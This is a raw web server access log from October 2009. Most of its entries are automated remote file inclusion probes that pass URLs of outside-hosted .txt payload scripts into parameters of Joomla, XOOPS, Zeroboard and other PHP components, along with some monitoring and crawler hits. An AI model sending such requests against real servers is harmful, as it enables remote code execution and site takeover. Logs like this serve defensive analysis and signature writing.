77.242.37.212 - - [06/Oct/2009:00:10:39 -0400] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.exprimerie.fr//components/com_virtuemart/zfxid1.txt? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
77.242.37.212 - - [06/Oct/2009:00:10:40 -0400] "GET /logs/access_log.Q109081300%20%20/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.exprimerie.fr//components/com_virtuemart/zfxid1.txt? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
77.242.37.212 - - [06/Oct/2009:00:10:43 -0400] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.exprimerie.fr//components/com_virtuemart/zfxid1.txt? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
77.242.37.212 - - [06/Oct/2009:00:10:43 -0400] "GET /logs/access_log.Q109051600%20%20/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.exprimerie.fr//components/com_virtuemart/zfxid1.txt? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
61.129.64.174 - - [06/Oct/2009:00:11:05 -0400] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.karuturi.com/baner.txt??? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
61.129.64.174 - - [06/Oct/2009:00:11:05 -0400] "GET /logs/access_log.Q109051600//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.karuturi.com/baner.txt??? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
61.129.64.174 - - [06/Oct/2009:00:11:09 -0400] "GET //kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.karuturi.com/baner.txt??? HTTP/1.1" 404 209 "-" "Mozilla/5.0"
218.234.19.49 - - [06/Oct/2009:00:11:30 -0400] "GET /logs/access_log.Q109072200/index.php?str=http://akar.web.tr/media/xml1.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
218.234.19.49 - - [06/Oct/2009:00:11:30 -0400] "GET /logs/index.php?str=http://akar.web.tr/media/xml1.txt?? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
218.234.19.49 - - [06/Oct/2009:00:11:30 -0400] "GET /index.php?str=http://akar.web.tr/media/xml1.txt?? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
218.234.19.49 - - [06/Oct/2009:00:11:30 -0400] "GET /logs/access_log.Q109052800/index.php?str=http://akar.web.tr/media/xml1.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
222.122.72.216 - - [06/Oct/2009:00:11:37 -0400] "GET /logs/errors.php?error=http://Theox.fileave.com/id1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
222.122.72.216 - - [06/Oct/2009:00:11:37 -0400] "GET /errors.php?error=http://Theox.fileave.com/id1.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
222.122.72.216 - - [06/Oct/2009:00:11:37 -0400] "GET /logs/access_log.Q109070500/errors.php?error=http://Theox.fileave.com/id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
222.73.17.7 - - [06/Oct/2009:00:12:08 -0400] "GET //modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.psgkorea.com/bbs/id1.txt??? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
222.73.17.7 - - [06/Oct/2009:00:12:08 -0400] "GET /logs/access_log.Q109082100%20%20//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.psgkorea.com/bbs/id1.txt??? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
222.73.17.7 - - [06/Oct/2009:00:12:13 -0400] "GET /logs//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.psgkorea.com/bbs/id1.txt??? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
222.73.17.7 - - [06/Oct/2009:00:12:16 -0400] "GET //modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.psgkorea.com/bbs/id1.txt??? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
222.73.17.7 - - [06/Oct/2009:00:12:16 -0400] "GET /logs//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.psgkorea.com/bbs/id1.txt??? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
222.73.17.7 - - [06/Oct/2009:00:12:16 -0400] "GET /logs/access_log.Q109082100%20%20//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.psgkorea.com/bbs/id1.txt??? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
61.129.64.174 - - [06/Oct/2009:00:12:35 -0400] "GET /logs/access_log.Q109051600%20%20//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.karuturi.com/baner.txt??? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
61.129.64.174 - - [06/Oct/2009:00:12:50 -0400] "GET /logs/access_log.Q109070100%20%20//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.karuturi.com/baner.txt??? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
209.59.12.99 - - [06/Oct/2009:00:13:02 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
222.73.17.7 - - [06/Oct/2009:00:14:03 -0400] "GET //modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.psgkorea.com/bbs/id1.txt??? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
222.73.17.7 - - [06/Oct/2009:00:14:03 -0400] "GET /logs//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.psgkorea.com/bbs/id1.txt??? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
222.73.17.7 - - [06/Oct/2009:00:14:03 -0400] "GET /logs/access_log.Q109080400//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.psgkorea.com/bbs/id1.txt??? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
222.73.17.7 - - [06/Oct/2009:00:14:21 -0400] "GET /logs/access_log.Q109081800//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.psgkorea.com/bbs/id1.txt??? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
218.234.19.49 - - [06/Oct/2009:00:15:21 -0400] "GET /index.php?str=http://akar.web.tr/media/xml1.txt?? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
218.234.19.49 - - [06/Oct/2009:00:15:21 -0400] "GET /logs/index.php?str=http://akar.web.tr/media/xml1.txt?? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
218.234.19.49 - - [06/Oct/2009:00:15:21 -0400] "GET /logs/access_log.Q109072200/index.php?str=http://akar.web.tr/media/xml1.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
218.234.19.49 - - [06/Oct/2009:00:15:21 -0400] "GET /logs/access_log.Q109052800/index.php?str=http://akar.web.tr/media/xml1.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
222.73.17.7 - - [06/Oct/2009:00:15:25 -0400] "GET /logs/access_log.Q109080400%20%20//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.psgkorea.com/bbs/id1.txt??? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
222.73.17.7 - - [06/Oct/2009:00:15:39 -0400] "GET /logs/access_log.Q109080400%20%20//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.psgkorea.com/bbs/id1.txt??? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
220.181.7.116 - - [06/Oct/2009:00:16:15 -0400] "GET / HTTP/1.1" 200 409 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
222.73.17.7 - - [06/Oct/2009:00:16:56 -0400] "GET //modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.psgkorea.com/bbs/id1.txt??? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
222.73.17.7 - - [06/Oct/2009:00:16:56 -0400] "GET /logs//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.psgkorea.com/bbs/id1.txt??? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
222.73.17.7 - - [06/Oct/2009:00:16:56 -0400] "GET /logs/access_log.Q109080400//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.psgkorea.com/bbs/id1.txt??? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
222.73.17.7 - - [06/Oct/2009:00:17:13 -0400] "GET /logs/access_log.Q109081800//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.psgkorea.com/bbs/id1.txt??? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
222.73.17.7 - - [06/Oct/2009:00:17:33 -0400] "GET //modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.psgkorea.com/bbs/id1.txt??? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
222.73.17.7 - - [06/Oct/2009:00:17:33 -0400] "GET /logs/access_log.Q109080400//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.psgkorea.com/bbs/id1.txt??? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
222.73.17.7 - - [06/Oct/2009:00:17:33 -0400] "GET /logs//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.psgkorea.com/bbs/id1.txt??? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
222.73.17.7 - - [06/Oct/2009:00:17:42 -0400] "GET /logs/access_log.Q109081800//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.psgkorea.com/bbs/id1.txt??? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
218.38.243.71 - - [06/Oct/2009:00:17:50 -0400] "GET //?_zb_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
218.38.243.71 - - [06/Oct/2009:00:17:51 -0400] "GET /logs/access_log.Q109063000//?_zb_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
209.59.12.99 - - [06/Oct/2009:00:18:02 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
218.38.243.71 - - [06/Oct/2009:00:18:08 -0400] "GET //?_zb_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
218.38.243.71 - - [06/Oct/2009:00:18:01 -0400] "GET /logs//?_zb_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 200 20719 "-" "Mozilla/5.0"
218.38.243.71 - - [06/Oct/2009:00:18:18 -0400] "GET /logs/access_log.Q109063000//?_zb_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
174.143.3.188 - - [06/Oct/2009:00:18:22 -0400] "GET /logs/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid=1&GLOBALS=&mosConfig_absolute_path=? HTTP/1.1" 404 212 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0"
174.143.3.188 - - [06/Oct/2009:00:18:22 -0400] "GET /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid=1&GLOBALS=&mosConfig_absolute_path=? HTTP/1.1" 404 207 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Win32)"
174.143.3.188 - - [06/Oct/2009:00:18:22 -0400] "GET /logs/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid=1&GLOBALS=&mosConfig_absolute_path=http://62.204.110.243/newscans.txt?? HTTP/1.1" 404 212 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)"
174.143.3.188 - - [06/Oct/2009:00:18:22 -0400] "GET /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid=1&GLOBALS=&mosConfig_absolute_path=http://62.204.110.243/newscans.txt?? HTTP/1.1" 404 207 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)"
81.222.131.98 - - [06/Oct/2009:00:19:49 -0400] "GET /logs/access_log.Q109072200%20%20/components/com_forum/download.php?phpbb_root_path=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
81.222.131.98 - - [06/Oct/2009:00:19:49 -0400] "GET /components/com_forum/download.php?phpbb_root_path=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 231 "-" "Mozilla/5.0"
81.222.131.98 - - [06/Oct/2009:00:19:49 -0400] "GET /logs/components/com_forum/download.php?phpbb_root_path=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
81.222.131.98 - - [06/Oct/2009:00:19:52 -0400] "GET /logs/access_log.Q109092200%20%20/components/com_forum/download.php?phpbb_root_path=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
74.6.22.152 - - [06/Oct/2009:00:20:13 -0400] "GET /logs/access_log.Q109091000 HTTP/1.0" 304 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
74.6.22.152 - - [06/Oct/2009:00:20:45 -0400] "GET /logs/error_log.Q109092200 HTTP/1.0" 200 1889688 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
74.6.22.152 - - [06/Oct/2009:00:20:53 -0400] "GET /logs/error_log.Q109092200 HTTP/1.0" 200 1889688 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
222.73.17.7 - - [06/Oct/2009:00:21:06 -0400] "GET //modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.psgkorea.com/bbs/id1.txt??? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
222.73.17.7 - - [06/Oct/2009:00:21:06 -0400] "GET /logs//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.psgkorea.com/bbs/id1.txt??? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
222.73.17.7 - - [06/Oct/2009:00:21:06 -0400] "GET /logs/access_log.Q109080400//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.psgkorea.com/bbs/id1.txt??? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
222.73.17.7 - - [06/Oct/2009:00:21:20 -0400] "GET /logs/access_log.Q109081800//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.psgkorea.com/bbs/id1.txt??? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
220.125.237.35 - - [06/Oct/2009:00:21:48 -0400] "GET ///e404.php?DOCUMENT_ROOT=http://www.politics.cau.ac.kr/bbs/skin/uks_gallery_v3020/fx29id.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
220.125.237.35 - - [06/Oct/2009:00:21:48 -0400] "GET /logs///e404.php?DOCUMENT_ROOT=http://www.politics.cau.ac.kr/bbs/skin/uks_gallery_v3020/fx29id.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
220.125.237.35 - - [06/Oct/2009:00:21:48 -0400] "GET /logs/access_log.Q109072900///e404.php?DOCUMENT_ROOT=http://www.politics.cau.ac.kr/bbs/skin/uks_gallery_v3020/fx29id.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
220.125.237.35 - - [06/Oct/2009:00:21:48 -0400] "GET /logs/access_log.Q109090900///e404.php?DOCUMENT_ROOT=http://www.politics.cau.ac.kr/bbs/skin/uks_gallery_v3020/fx29id.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
123.125.66.59 - - [06/Oct/2009:00:21:52 -0400] "GET / HTTP/1.1" 200 409 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
82.151.132.176 - - [06/Oct/2009:00:22:12 -0400] "GET ///e404.php?DOCUMENT_ROOT=http://hidost.com//images/id.txt? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
82.151.132.176 - - [06/Oct/2009:00:22:12 -0400] "GET /logs///e404.php?DOCUMENT_ROOT=http://hidost.com//images/id.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
82.151.132.176 - - [06/Oct/2009:00:22:12 -0400] "GET /logs/access_log.Q109072900///e404.php?DOCUMENT_ROOT=http://hidost.com//images/id.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
82.151.132.176 - - [06/Oct/2009:00:22:12 -0400] "GET /logs/access_log.Q109090900///e404.php?DOCUMENT_ROOT=http://hidost.com//images/id.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
209.59.12.99 - - [06/Oct/2009:00:23:03 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
69.175.35.138 - - [06/Oct/2009:00:23:34 -0400] "GET //skin/ggambo7002_gallery/setup.php?dir=http://www.learncarego.org/language/english/copyright.txt???? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
69.175.35.138 - - [06/Oct/2009:00:23:34 -0400] "GET /logs/access_log.Q109051100//skin/ggambo7002_gallery/setup.php?dir=http://www.learncarego.org/language/english/copyright.txt???? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
69.175.35.138 - - [06/Oct/2009:00:23:34 -0400] "GET /logs//skin/ggambo7002_gallery/setup.php?dir=http://www.learncarego.org/language/english/copyright.txt???? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
69.175.35.138 - - [06/Oct/2009:00:24:13 -0400] "GET /logs/access_log.Q109081900//skin/ggambo7002_gallery/setup.php?dir=http://www.learncarego.org/language/english/copyright.txt???? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
128.125.169.162 - - [06/Oct/2009:00:24:31 -0400] "GET /logs/access_log.Q109063000//include.php?path[docroot]=http://banlat.ac.th/22.jpg??%0D?? HTTP/1.1" 404 237 "-" "libwww-perl/5.79"
128.125.169.162 - - [06/Oct/2009:00:24:31 -0400] "GET //include.php?path[docroot]=http://banlat.ac.th/22.jpg??%0D?? HTTP/1.1" 404 210 "-" "libwww-perl/5.79"
128.125.169.162 - - [06/Oct/2009:00:24:31 -0400] "GET /logs//include.php?path[docroot]=http://banlat.ac.th/22.jpg??%0D?? HTTP/1.1" 404 215 "-" "libwww-perl/5.79"
128.125.169.162 - - [06/Oct/2009:00:24:31 -0400] "GET /logs/access_log.Q109071300//include.php?path[docroot]=http://banlat.ac.th/22.jpg??%0D?? HTTP/1.1" 404 237 "-" "libwww-perl/5.79"
69.20.67.111 - - [06/Oct/2009:00:24:38 -0400] "GET //common/db.php?commonpath=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
69.20.67.111 - - [06/Oct/2009:00:24:38 -0400] "GET /logs/access_log.Q109091000%20%20//common/db.php?commonpath=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
69.20.67.111 - - [06/Oct/2009:00:24:38 -0400] "GET /logs//common/db.php?commonpath=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 404 217 "-" "Mozilla/5.0"
69.20.67.111 - - [06/Oct/2009:00:24:47 -0400] "GET //common/db.php?commonpath=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
69.20.67.111 - - [06/Oct/2009:00:24:47 -0400] "GET /logs/access_log.Q109091000%20%20//common/db.php?commonpath=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
69.20.67.111 - - [06/Oct/2009:00:24:47 -0400] "GET /logs//common/db.php?commonpath=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 404 217 "-" "Mozilla/5.0"
69.20.67.111 - - [06/Oct/2009:00:24:47 -0400] "GET /logs/error_log.Q109071100//common/db.php?commonpath=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
69.20.67.111 - - [06/Oct/2009:00:24:47 -0400] "GET /logs/access_log.Q109092400//common/db.php?commonpath=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
69.20.67.111 - - [06/Oct/2009:00:24:55 -0400] "GET /logs/access_log.Q109092400//common/db.php?commonpath=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
69.20.67.111 - - [06/Oct/2009:00:24:56 -0400] "GET /logs/error_log.Q109071100//common/db.php?commonpath=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
81.222.131.98 - - [06/Oct/2009:00:25:14 -0400] "GET /logs/access_log.Q109072200/components/com_forum/download.php?phpbb_root_path=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
81.222.131.98 - - [06/Oct/2009:00:25:14 -0400] "GET /logs/access_log.Q109090100/components/com_forum/download.php?phpbb_root_path=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
82.151.132.176 - - [06/Oct/2009:00:25:41 -0400] "GET /logs/access_log.Q109072900%20%20///e404.php?DOCUMENT_ROOT=http://hidost.com//images/id.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
82.151.132.176 - - [06/Oct/2009:00:25:45 -0400] "GET /logs/access_log.Q109090900%20%20///e404.php?DOCUMENT_ROOT=http://hidost.com//images/id.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
220.125.237.35 - - [06/Oct/2009:00:27:14 -0400] "GET ///e404.php?DOCUMENT_ROOT=http://www.politics.cau.ac.kr/bbs/skin/uks_gallery_v3020/fx29id.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
220.125.237.35 - - [06/Oct/2009:00:27:14 -0400] "GET /logs/access_log.Q109072900///e404.php?DOCUMENT_ROOT=http://www.politics.cau.ac.kr/bbs/skin/uks_gallery_v3020/fx29id.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
220.125.237.35 - - [06/Oct/2009:00:27:14 -0400] "GET /logs///e404.php?DOCUMENT_ROOT=http://www.politics.cau.ac.kr/bbs/skin/uks_gallery_v3020/fx29id.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
220.125.237.35 - - [06/Oct/2009:00:27:19 -0400] "GET /logs/access_log.Q109072900%20%20///e404.php?DOCUMENT_ROOT=http://www.politics.cau.ac.kr/bbs/skin/uks_gallery_v3020/fx29id.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
220.125.237.35 - - [06/Oct/2009:00:27:24 -0400] "GET /logs/access_log.Q109090900///e404.php?DOCUMENT_ROOT=http://www.politics.cau.ac.kr/bbs/skin/uks_gallery_v3020/fx29id.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
220.125.237.35 - - [06/Oct/2009:00:28:01 -0400] "GET /logs/access_log.Q109090900%20%20///e404.php?DOCUMENT_ROOT=http://www.politics.cau.ac.kr/bbs/skin/uks_gallery_v3020/fx29id.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
209.59.12.99 - - [06/Oct/2009:00:28:02 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
74.6.22.152 - - [06/Oct/2009:00:28:33 -0400] "GET /logs/access_log.Q109091200 HTTP/1.0" 200 2862401 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
174.143.3.188 - - [06/Oct/2009:00:29:08 -0400] "GET /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid=1&GLOBALS=&mosConfig_absolute_path=? HTTP/1.1" 404 207 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4"
174.143.3.188 - - [06/Oct/2009:00:29:08 -0400] "GET /logs/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid=1&GLOBALS=&mosConfig_absolute_path=? HTTP/1.1" 404 212 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)"
174.143.3.188 - - [06/Oct/2009:00:29:08 -0400] "GET /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid=1&GLOBALS=&mosConfig_absolute_path=http://62.204.110.243/newscans.txt?? HTTP/1.1" 404 207 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)"
174.143.3.188 - - [06/Oct/2009:00:29:08 -0400] "GET /logs/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid=1&GLOBALS=&mosConfig_absolute_path=http://62.204.110.243/newscans.txt?? HTTP/1.1" 404 212 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)"
72.9.225.71 - - [06/Oct/2009:00:29:32 -0400] "GET //technote7/skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://www.karuturi.com/baner.txt??? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
72.9.225.71 - - [06/Oct/2009:00:29:32 -0400] "GET /logs/access_log.Q109071100%20%20//technote7/skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://www.karuturi.com/baner.txt??? HTTP/1.1" 404 290 "-" "Mozilla/5.0"
72.9.225.71 - - [06/Oct/2009:00:29:32 -0400] "GET /logs//technote7/skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://www.karuturi.com/baner.txt??? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
195.186.64.229 - - [06/Oct/2009:00:29:36 -0400] "GET //technote7/skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://unixstats.org/tools/idxx.txt?? HTTP/1.0" 404 261 "-" "Mozilla/5.0"
195.186.64.229 - - [06/Oct/2009:00:29:36 -0400] "GET /logs//technote7/skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://unixstats.org/tools/idxx.txt?? HTTP/1.0" 404 266 "-" "Mozilla/5.0"
195.186.64.229 - - [06/Oct/2009:00:29:36 -0400] "GET /logs/access_log.Q109061600%20%20//technote7/skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://unixstats.org/tools/idxx.txt?? HTTP/1.0" 404 290 "-" "Mozilla/5.0"
72.9.225.71 - - [06/Oct/2009:00:29:37 -0400] "GET /logs/access_log.Q109081500%20%20//technote7/skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://www.karuturi.com/baner.txt??? HTTP/1.1" 404 290 "-" "Mozilla/5.0"
67.15.108.170 - - [06/Oct/2009:00:29:57 -0400] "GET //technote7/skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://www.karuturi.com/baner.txt??? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
67.15.108.170 - - [06/Oct/2009:00:29:57 -0400] "GET /logs//technote7/skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://www.karuturi.com/baner.txt??? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
67.15.108.170 - - [06/Oct/2009:00:29:57 -0400] "GET /logs/access_log.Q109071100%20%20//technote7/skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://www.karuturi.com/baner.txt??? HTTP/1.1" 404 290 "-" "Mozilla/5.0"
67.15.108.170 - - [06/Oct/2009:00:30:04 -0400] "GET /logs/access_log.Q109081500%20%20//technote7/skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://www.karuturi.com/baner.txt??? HTTP/1.1" 404 290 "-" "Mozilla/5.0"
71.91.76.215 - - [06/Oct/2009:00:30:34 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/5.0 (iPod; U; CPU iPhone OS 3_1_1 like Mac OS X; en-us) AppleWebKit/528.18 (KHTML, like Gecko) Version/4.0 Mobile/7C145 Safari/528.16"
71.91.76.215 - - [06/Oct/2009:00:30:35 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/5.0 (iPod; U; CPU iPhone OS 3_1_1 like Mac OS X; en-us) AppleWebKit/528.18 (KHTML, like Gecko) Version/4.0 Mobile/7C145 Safari/528.16"
74.6.22.152 - - [06/Oct/2009:00:30:50 -0400] "GET /robots.txt HTTP/1.0" 404 208 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
218.55.227.178 - - [06/Oct/2009:00:30:53 -0400] "GET /logs/access_log.Q109051700//skin/zero_vote/error.php?dir=http://124.138.58.254/~zpissh/bbs////skin/ggambo7002_board/scripts/ad.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
218.55.227.178 - - [06/Oct/2009:00:30:53 -0400] "GET //skin/zero_vote/error.php?dir=http://124.138.58.254/~zpissh/bbs////skin/ggambo7002_board/scripts/ad.txt?? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
218.55.227.178 - - [06/Oct/2009:00:30:53 -0400] "GET /logs//skin/zero_vote/error.php?dir=http://124.138.58.254/~zpissh/bbs////skin/ggambo7002_board/scripts/ad.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
